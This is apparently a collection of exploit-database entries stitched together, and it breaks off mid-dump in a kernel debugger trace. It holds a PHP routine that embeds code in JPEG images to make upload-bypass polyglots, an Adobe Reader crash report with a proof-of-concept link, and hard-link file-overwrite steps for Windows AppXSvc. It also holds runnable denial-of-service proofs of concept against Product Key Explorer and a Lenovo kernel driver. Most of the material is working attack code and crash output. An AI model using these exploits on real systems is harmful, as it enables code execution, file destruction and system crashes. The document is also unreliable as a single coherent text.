function tryInject($orig, $code, $quality)
{
    $result_file = 'image.jpg.phar';
    $tmp_filename = $orig . '_mod2.jpg';
    //Create base image and load its data
    $src = imagecreatefromjpeg($orig);
    imagejpeg($src, $tmp_filename, $quality);
    $data = file_get_contents($tmp_filename);
    $tmpData = array();
    echo "[+] Jumping to end byte\n";
    // findStart() returns -1 when no SOS marker exists; the loop below then
    // runs all the way down to offset 0 instead of stopping early.
    $start_byte = findStart($data);
    echo "[+] Searching for valid injection point\n";
    for($i = strlen($data)-1; $i > $start_byte; --$i)
    {
        $tmpData = $data;
        // Overwrite bytes ($i - strlen($code) + 1) .. $i with $code, last byte first.
        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
        {
            $tmpData[$n] = $code[$z];
        }
        $src = imagecreatefromstring($tmpData);
        imagejpeg($src, $result_file, $quality);
        if(checkCodeInFile($result_file, $code))
        {
            unlink($tmp_filename);
            unlink($result_file);
            sleep(1);
            // The raw candidate ($tmpData) is what is kept, not GD's re-encode of it.
            file_put_contents($result_file, $tmpData);
            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
            sleep(1);
            // Load-check only; the resulting image handle is discarded.
            $src = imagecreatefromjpeg($result_file);
            return true;
        }
        else
        {
            unlink($result_file);
        }
    }
    unlink($orig);
    unlink($tmp_filename);
    return false;
}
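/**
 * Return the offset just past the first JPEG Start-Of-Scan marker (FF DA).
 *
 * @param string $str raw JPEG bytes
 * @return int index of the first byte after the marker, or -1 when no marker
 *             is present (including for the empty string)
 */
function findStart($str)
{
    // Stop one byte early: the pair test reads $str[$i+1], and the previous
    // bound let the last iteration read one past the end of the string
    // (an uninitialized-offset notice, hidden by the E_PARSE reporting level).
    $last = strlen($str) - 1;
    for($i = 0; $i < $last; ++$i)
    {
        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
        {
            return $i+2;
        }
    }
    return -1;
}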
/**
 * Report whether the literal $code occurs in $file.
 *
 * A missing file is searched as if its contents were the single byte "0",
 * so the call never fails on a file that does not exist.
 *
 * @param string $file path to inspect
 * @param string $code needle
 * @return string|false the contents from the first occurrence of $code
 *                      onwards, or false when it is absent
 */
function checkCodeInFile($file, $code)
{
    $contents = file_exists($file) ? loadFile($file) : "0";
    return strstr($contents, $code);
}
/**
 * Read $file completely and return its bytes.
 *
 * Opens in "r" mode and reads exactly filesize($file) bytes in one fread().
 *
 * @param string $file path to read
 * @return string|false the file contents, or false when fread() fails
 */
function loadFile($file)
{
    $fh = fopen($file, "r");
    $length = filesize($file);
    $contents = fread($fh, $length);
    fclose($fh);
    return $contents;
}
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
--- cut ---
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34
eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
CoolType!CTInit+0x3913e:
10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194
0:000> u @eip-14
CoolType!CTInit+0x3912a:
10e6c28a 8b7d0c mov edi,dword ptr [ebp+0Ch]
10e6c28d 8b571c mov edx,dword ptr [edi+1Ch]
10e6c290 8b7720 mov esi,dword ptr [edi+20h]
10e6c293 035508 add edx,dword ptr [ebp+8]
10e6c296 8b4724 mov eax,dword ptr [edi+24h]
10e6c299 037508 add esi,dword ptr [ebp+8]
10e6c29c 03c6 add eax,esi
10e6c29e 8902 mov dword ptr [edx],eax
0:000> ? poi(edi+1c)
Evaluate expression: -690332 = fff57764
0:000> ? poi(ebp+8)
Evaluate expression: 1887538240 = 70818c40
0:000> !heap -p -a 70818c40
address 70818c40 found in
_DPH_HEAP_ROOT @ bfc1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
723d3b94: 70818c40 173c0 - 70818000 19000
unknown!fillpattern
0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c
77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6
77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
77e7ccee ntdll!RtlAllocateHeap+0x0000003e
0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
77c2f1f6 ucrtbase!_malloc_base+0x00000026
5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9
10e37991 CoolType!CTInit+0x00004831
10e38e1b CoolType!CTInit+0x00005cbb
10e68870 CoolType!CTInit+0x00035710
10e683dc CoolType!CTInit+0x0003527c
10e67d25 CoolType!CTInit+0x00034bc5
10e65902 CoolType!CTInit+0x000327a2
10e633f2 CoolType!CTInit+0x00030292
10e62719 CoolType!CTInit+0x0002f5b9
10e620e8 CoolType!CTInit+0x0002ef88
10e62000 CoolType!CTInit+0x0002eea0
108f36f1 AGM!AGMInitialize+0x0002a881
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e
01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82
02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6
03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87
04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef
05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750
06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99
07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac
08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292
09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9
0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88
0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0
0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881
0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce
0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197
0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c
--- cut ---
Notes:
- The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability.
- Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case).
- Attached samples: poc[1-4].pdf (crashing files).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip
# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS)
# Date: 2019-10-28
# Exploit Author: Gabor Seljan
# Vendor Homepage: https://www.microsoft.com/
# Version: 17763.1.amd64fre.rs5_release.180914-1434
# Tested on: Windows 10 Version 1809 for x64-based Systems
# CVE: CVE-2019-1476
# Summary:
# AppXSvc improperly handles file hard links resulting in a low privileged user
# being able to overwrite an arbitrary file leading to elevation of privilege.
# Description:
# An elevation of privilege vulnerability exists when the AppX Deployment Server
# (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
# originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced
# to overwrite an arbitrary file by deleting all registry data files before
# creating the file hard link. As Nabeel Ahmed described in his write-up of
# CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with
# the original settings.dat template. However, additional settings.dat.LOG1 and
# settings.dat.LOG2 files are also created during the initialization process.
# Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard
# link allows a low privileged user to overwrite an arbitrary file with registry
# data or just simply empty it, respectively. A low privileged user could exploit
# this vulnerability to cause denial of service by overwriting critical system
# files.
Steps to reproduce:
1. Terminate Paint 3D processes.
2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder.
3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini.
4. Execute the start ms-paint: command to run Paint 3D.
5. Terminate Paint 3D processes.
Expected result:
It isn't possible to overwrite a file not writable by a low privileged user.
Observed result:
C:\Windows\win.ini file is overwritten with registry data.
References:
https://github.com/sgabe/CVE-2019-1476
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476
https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC)
# Discovery by: SajjadBnd
# Date: 2019-12-10
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# [ About App ]
# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
# Visit "Features" page to see all supported software list of programs with which product key finder works.
# Product Key Finder | Best Product Key Finder Software
# The Best Product Key Find and Recovery Software
# Product key Explorer recovers product keys for software installed on your
# local and network computers, allows track the number of software licenses installed in your business.
# Product Key Finder | Best Product Key Finder Software
# The Best Product Key Find and Recovery Software
# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
# Product Key Finder | Best Product Key Finder Software
# The Best Product Key Find and Recovery Software
# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
# [ POC ]
# 1. Run the python script; it will create a new file "dos.txt"
# 2. Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 3. Paste the content of dos.txt into the field 'Key'
# 4. Click 'OK'
# 5. Crashed ;)
#!/usr/bin/env python
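# 258-byte input (100 x 'A', 100 x 'B', 58 x 'C') that the PoC steps above
# paste into the 'Key' field.
buffer = "\x41" * 100
buffer += "\x42" * 100
buffer += "\x43" * 58
try:
    # with-statement closes the file even when write() fails; the former
    # bare except is narrowed to file-system errors so genuine bugs still
    # surface, and the reason for a failure is printed instead of being lost.
    with open("dos.txt","w") as f:
        print("[+] Creating %s bytes DOS payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except (IOError, OSError) as exc:
    print("File cannot be created")
    print(exc)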
# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
# Date: 2019-12-11
# Exploit Author: Nassim Asrir
# CVE: CVE-2019-6192
# Tested On: Windows 10(64bit) | ThinkPad T470p
# Vendor : https://www.lenovo.com/us/en/
# Ref : https://support.lenovo.com/us/fr/solutions/len-29334
# Description
# A vulnerability in the pmdrvs.sys driver has been discovered in the Lenovo Power Management Driver.
# The vulnerability exists due to insufficient input buffer validation when the driver processes IOCTL codes.
# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
# Exploit
#include <windows.h>
#include <stdio.h>
#include <conio.h>
/*
 * PoC driver for CVE-2019-6192: opens \\.\pmdrvs and issues IOCTL 0x80862013
 * with zero-length input and output buffers. The RCA below shows the driver
 * faulting on `mov eax,dword ptr [rdi]` with rdi == 0 for that request,
 * consistent with the header's note that the IOCTL path does not validate
 * the supplied buffer/length before use.
 *
 * argc/argv are unused. Always returns 0.
 */
int main(int argc, char **argv)
{
    HANDLE hDevice;
    DWORD bret;
    char szDevice[] = "\\\\.\\pmdrvs";
    printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
    printf("Opening handle to driver..\n");
    if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {
        printf("Device %s succesfully opened!\n", szDevice);
        printf("\tHandle: %p\n", hDevice);
    }
    else
    {
        /* Failure is only reported: execution continues and the
         * DeviceIoControl below is still issued on INVALID_HANDLE_VALUE. */
        printf("Error: Error opening device %s\n", szDevice);
    }
    printf("\nPress any key to DoS..");
    _getch();
    bret = 0;
    /* Both buffer sizes are 0, so 0xdeadbeef is never dereferenced on the
     * user side; the kernel sees a zero-length request with no valid buffer. */
    if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
    {
        printf("DeviceIoControl Error - bytes returned %#x\n", bret);
    }
    CloseHandle(hDevice);
    return 0;
}
# RCA
2: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck
Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.
FAULTING_IP:
pmdrvs+109d
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
Resetting default scope
CPU_COUNT: 8
CPU_MHZ: af8
CPU_VENDOR: GenuineIntel
CPU_FAMILY: 6
CPU_MODEL: 9e
CPU_STEPPING: 9
CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)
BLACKBOXBSD: 1 (!blackboxbsd)
BLACKBOXPNP: 1 (!blackboxpnp)
CURRENT_IRQL: 0
ANALYSIS_SESSION_HOST: LAPTOP-SP
ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485
ANALYSIS_VERSION: 10.0.17763.132 amd64fre
LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d
STACK_TEXT:
ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d
ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060
ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59
ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071
ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc
ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925
00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844
THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb
THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b
FOLLOWUP_IP:
pmdrvs+109d
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
FAULT_INSTR_CODE: 8941078b
SYMBOL_STACK_INDEX: 0
FOLLOWUP_NAME: MachineOwner
STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb
BUGCHECK_STR: 2E8B5A19
EXCEPTION_CODE_STR: 2E8B5A19
EXCEPTION_STR: WRONG_SYMBOLS
PROCESS_NAME: ntoskrnl.wrong.symbols.exe
IMAGE_NAME: ntoskrnl.wrong.symbols.exe
MODULE_NAME: nt_wrong_symbols
SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000
BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS
FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000
TARGET_TIME: 2019-09-30T19:27:36.000Z
OSBUILD: 17763
OSSERVICEPACK: 0
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
SUITE_MASK: 272
PRODUCT_TYPE: 1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS
OS_LOCALE:
USER_LCID: 0
OSBUILD_TIMESTAMP: 1994-09-30 01:21:45
BUILDDATESTAMP_STR: 180914-1434
BUILDLAB_STR: rs5_release
BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434
ANALYSIS_SESSION_ELAPSED_TIME: ae
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000
FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}
Followup: MachineOwner
---------
2: kd> u fffff804`28bf109d
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax
fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)
fffff804`28bf10a8 85c0 test eax,eax
fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132)
fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]
fffff804`28bf10b8 4885c9 test rcx,rcx
fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)
2: kd> !for_each_frame .frame /r @$Frame
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!KeBugCheckEx:
fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7f09:
fffff804`1f27a8e9 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x735c:
fffff804`1f279d3c b801000000 mov eax,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!_chkstk+0x41f:
fffff804`1f271b4f 0f1f00 nop dword ptr [rax]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!RtlUnwindEx+0x3440:
fffff804`1f1ca460 8bd0 mov edx,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000
rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40
r14=ffffc709dee8f4b0 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!ExReleaseAutoExpandPushLockExclusive+0x264:
fffff804`1f0d7c24 84c0 test al,al
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7fe2:
fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x42ce:
fffff804`1f276cae 440f20c0 mov rax,cr8
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000
rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
pmdrvs+0x5060:
fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!IofCallDriver+0x59:
fffff804`1f12dba9 4883c438 add rsp,38h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
